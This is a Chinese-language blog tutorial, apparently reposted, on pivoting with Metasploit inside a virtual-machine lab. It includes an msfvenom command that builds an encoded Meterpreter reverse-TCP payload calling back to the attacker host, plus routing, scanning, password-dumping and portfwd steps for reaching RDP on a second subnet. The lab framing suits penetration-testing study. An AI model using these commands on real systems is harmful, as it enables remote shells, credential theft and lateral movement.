使用Metasploit进行路由转发

使用Metasploit进行路由转发_第1张图片
Metasploit

使用Metasploit进行路由转发

0x01 前言

在进行渗透测试时,端口转发的主要目的是帮助我们能够访问不在于同一网段上的系统上的特定端口,方便我们进行进一步的渗透测试。
为了更好地理解这一点,我用虚拟机来演示这个步骤,假设我们已经进入了 网络范围为192.168.123.0/24的这一个网段,目标是192.168.206.200

0x02环境

Attacker ip: 192.168.123.178 --> parrot
中转ip: 192.168.123.164 --> windows7
target ip: 192.168.206.200 --> win2012
wing

使用Metasploit进行路由转发_第2张图片
wing

使用Metasploit进行路由转发_第3张图片
wing

0x03 实验步骤

这上面三张图已经显示环境的大概信息了,现在的问题就两个:

  • 我怎么去构建实验环境,目标机上面有两个ip或者多个
  • 我怎么通过我的parrot去渗透win2012,因为我们不在同一个网段

先说第一个:
我们虚拟机有添加网络适配器的功能,选择桥接模式就好了。


使用Metasploit进行路由转发_第4张图片
wing

使用Metasploit进行路由转发_第5张图片
wing

在windows7和windows 2012的虚拟机中都这么添加即可!

生成payload

先生成一个payload放在win7上,获得一个session先。

msfvenom -p windows/meterpreter/reverse_tcp -e /x86/shikata_ga_nai -i 5 LHOST=192.168.123.178 LPORT=1234 -f exe -o /root/wing.exe
wing

在root目录下用建立一个简单的http服务器:

python -m SimpleHTTPServer
wing
使用Metasploit进行路由转发_第6张图片
wing
使用Metasploit进行路由转发_第7张图片
wing

成功获得session


wing

查看目标的ip段:


使用Metasploit进行路由转发_第8张图片
wing

添加一条路由:

background
route add 192.168.206.200  255.255.255.0  1
route print
#实战中建议直接route add 192.168.206.0  255.255.255.0  1
使用Metasploit进行路由转发_第9张图片
wing

现在就能用msf扫描目标

wing

我这里的目标机是win2012,所以不能直接利用漏洞,内网中17-010和08-067还是蛮多的,直接批量扫描即可!
下面就是常规操作:
迁移进程:


wing

读密码:


使用Metasploit进行路由转发_第10张图片
wing

使用Metasploit进行路由转发_第11张图片
wing

得到这个密码后,扫描3389一下,刚刚扫描已经完成了,是开放的,立马做一个的端口转发,利用 portfwd
portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听.使用方法如下:

meterpreter > portfwd 
0 total local port forwards.
meterpreter > portfwd  -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
    -L   The local host to listen on (optional).
    -h        Help banner.
    -l   The local port to listen on.
    -p   The remote port to connect to.
    -r   The remote host to connect to.

其实就是把远程端口映射到本地。
什么是映射呢?这就要说到我们可爱的高等数学了。就是一一映射。行吧,我抽风了。QWQ
command:

portfwd add -l 3389 -r 192.168.206.200 -p 3389

验证:


使用Metasploit进行路由转发_第12张图片
wing

ok!
远程桌面连接:

rdesktop 127.1.1.0:3389

我的parrot好像不支持这玩意。。。
说显示器无法打开。kali下应该没问题,自测吧。
balalalalala!
下次介绍如何增强你可视化武器-->"cs"

博客地址:hackerwing.com

你可能感兴趣的:(使用Metasploit进行路由转发)